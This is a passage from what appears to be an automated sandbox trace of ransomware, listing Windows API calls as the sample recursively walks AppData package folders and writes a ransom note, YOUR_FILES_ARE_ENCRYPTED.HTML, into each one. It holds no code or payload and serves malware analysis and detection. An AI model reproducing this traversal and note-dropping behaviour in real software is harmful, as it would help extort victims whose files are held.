pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.575] GetProcessHeap () returned 0x600000 [0120.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.575] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.576] CloseHandle (hObject=0x320) returned 1 [0120.576] GetProcessHeap () returned 0x600000 [0120.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.576] GetProcessHeap () returned 0x600000 [0120.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.576] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.577] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.577] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0120.577] GetProcessHeap () returned 0x600000 [0120.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0120.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.577] WriteFile (in: hFile=0x214, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.578] CloseHandle (hObject=0x214) returned 1 [0120.578] GetProcessHeap () returned 0x600000 [0120.578] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.578] GetProcessHeap () returned 0x600000 [0120.579] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.580] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0a47a2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc70cdea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", cAlternateFileName="MIA6CE~1.WIN")) returned 1 [0120.580] StrStrIW (lpFirst="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.580] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe") returned 93 [0120.580] GetProcessHeap () returned 0x600000 [0120.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.581] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" [0120.581] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\*" [0120.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0a47a2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc70cdea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.594] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0a47a2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc70cdea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.594] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0a47a2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0a47a2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc2e0dfa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.594] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.596] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC") returned 96 [0120.596] GetProcessHeap () returned 0x600000 [0120.596] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.597] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC" [0120.597] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\*" [0120.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0a47a2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0a47a2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc2e0dfa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.603] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0a47a2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0a47a2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc2e0dfa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.603] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.603] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.603] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache") returned 106 [0120.603] GetProcessHeap () returned 0x600000 [0120.604] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.605] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache" [0120.605] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.605] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.605] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.605] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.605] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.605] GetProcessHeap () returned 0x600000 [0120.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.608] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.609] CloseHandle (hObject=0x324) returned 1 [0120.609] GetProcessHeap () returned 0x600000 [0120.609] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.609] GetProcessHeap () returned 0x600000 [0120.609] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.609] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.609] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.609] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies") returned 108 [0120.609] GetProcessHeap () returned 0x600000 [0120.609] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.609] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies" [0120.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.609] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.610] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.610] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.610] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0120.610] GetProcessHeap () returned 0x600000 [0120.610] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.610] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.611] CloseHandle (hObject=0x324) returned 1 [0120.611] GetProcessHeap () returned 0x600000 [0120.611] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.611] GetProcessHeap () returned 0x600000 [0120.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.612] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.612] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.612] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory") returned 108 [0120.612] GetProcessHeap () returned 0x600000 [0120.612] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.613] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory" [0120.613] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.614] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.614] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.614] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.614] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0120.614] GetProcessHeap () returned 0x600000 [0120.614] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 